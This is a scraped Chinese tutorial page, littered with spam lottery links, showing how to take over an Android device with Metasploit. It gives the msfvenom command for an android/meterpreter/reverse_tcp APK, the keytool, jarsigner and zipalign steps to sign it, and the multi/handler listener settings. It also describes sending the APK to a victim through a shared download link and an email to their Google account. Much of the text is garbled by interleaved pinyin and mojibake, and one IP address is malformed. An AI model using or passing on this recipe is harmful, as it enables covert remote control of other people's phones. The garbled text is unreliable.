IT技(ji)術(shu)互動(dong)交流平台

大发11选5官网

作者︰佚名  發布日期︰2020-02-26 00:27:21


文(wen)章內容可能(neng)具有一(yi)定攻擊性,本文(wen)僅(jin)供技(ji)術(shu)交流,如有非(fei)法(fa)使用後果自負。
在這次(ci)的(de)實驗中(zhong),我yi) 褂ali linux和安(an)卓模擬(ni)器演(yan)示如何使用Metasploit框架控制Android設備。
創建負載(zai)
我們需要兩台虛(xu)擬(ni)機︰Kali Linux和安(an)卓模擬(ni)器。

 
 
打開vm啟動(dong)Kali linux。接(jie)著打開終端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的(de)組合。它是一(yi)個單一(yi)的(de)工具。它有標準(zhun)的(de)命令行(xing)選項。 Msfvenom用來制造的(de)有xing)?zai)荷用來滲透(tou)Android模擬(ni)器。
一(yi)旦(dan)打開終端提示符下輸入以下命令,使用msfvenom工具來創建有xing)?zai)荷APK文(wen)件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 設置(zhi)要使用的(de)payload
LHOST 設置(zhi)用來接(jie)收反(fan)彈(dan)連接(jie)的(de)主機
LPORT 設置(zhi)用來接(jie)收反(fan)彈(dan)連接(jie)的(de)端口
R 設置(zhi)文(wen)件格式
Location 要保(bao)存的(de)文(wen)件位置(zhi)
這個命令執(zhi)行(xing)完之(zhi)後,你會(hui)看到(dao)一(yi)些錯誤(wu),但不用擔心。現在可以到(dao)輸出(chu)目錄查看生成的(de)apk了。

 
 
我們已(yi)經(jing)成功創建了Android格式(APK)文(wen)件的(de)有xing)?zai)荷。現在一(yi)般Android的(de)移動(dong)設備不允(yun)許安(an)裝沒有適當簽名證書的(de)應用程序。 Android設備只(zhi)安(an)裝帶有簽署文(wen)件的(de)APK。
我們可以yun)褂萌縵鹿?囈xing)手動(dong)簽名︰
l Keytool (已(yi)安(an)裝)
l jar signer (已(yi)安(an)裝)
l zipalign (需要安(an)裝)
執(zhi)行(xing)下列命令簽名。首(shou)先使用密(mi)鑰工具創建密(mi)鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

 
然後使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
`

 
Kali沒有預裝Zipalign,需要先apt-get install zipalign。然後用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

 
現在我們有了一(yi)個帶有簽名的(de)APK,它可以安(an)裝在任何設備上(shang)。

 
使用Metasploit進行(xing)測(ce)試(shi)
接(jie)下來啟動(dong)metasploit的(de)監听(ting)器。執(zhi)行(xing)msfconsole打開控制台。

 
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

 

是時(shi)候將(jiang)惡意的(de)APK發送到(dao)手zhi)shang)。我們這里使用一(yi)個網盤上(shang)傳我們的(de)APK,並將(jiang)下lue)zai)鏈接(jie)分(fen)享出(chu)去。

 
 
這是我們切換到(dao)安(an)卓模擬(ni)器。
1、從(cong)https://code.google.com/archive/p/android-x86/downloads下lue)zai)android x86的(de)iso。
2、使用vmware創建一(yi)個內核版本為2.6的(de)虛(xu)擬(ni)機。
3、掛載(zai)鏡像,啟動(dong)虛(xu)擬(ni)機。
4、進入Live模式。
5、設置(zhi)手zhi) 鍬焦雀枵屎hao)。
在安(an)卓模擬(ni)器里面(mian)點擊那個鏈接(jie)並下lue)zai)。我們已(yi)經(jing)發送了一(yi)封(feng)郵件到(dao)受害者的(de)谷歌帳號(hao)上(shang)。

 
另(ling)外要允(yun)許安(an)卓安(an)裝來歷不明的(de)apk。



 
切換回Kali,我們發現zhi)唇 艘yi)個新的(de)會(hui)話。

 
然後你就(jiu)可以為所欲為的(de)操作這台“手zhi)rdquo;了。

 
 
  • 大发11选5官网

About IT165 - 廣告服務 - 隱私聲明 - 版權申明 - 免責(ze)條款 - 網站地圖(tu) - 網友投(tou)稿 - 聯(lian)系方式
本站內容來自于互聯(lian)網,僅(jin)供用于網絡(luo)技(ji)術(shu)學習,學習中(zhong)請遵循相關法(fa)律法(fa)規(gui)
大发11选5官网 | 下一页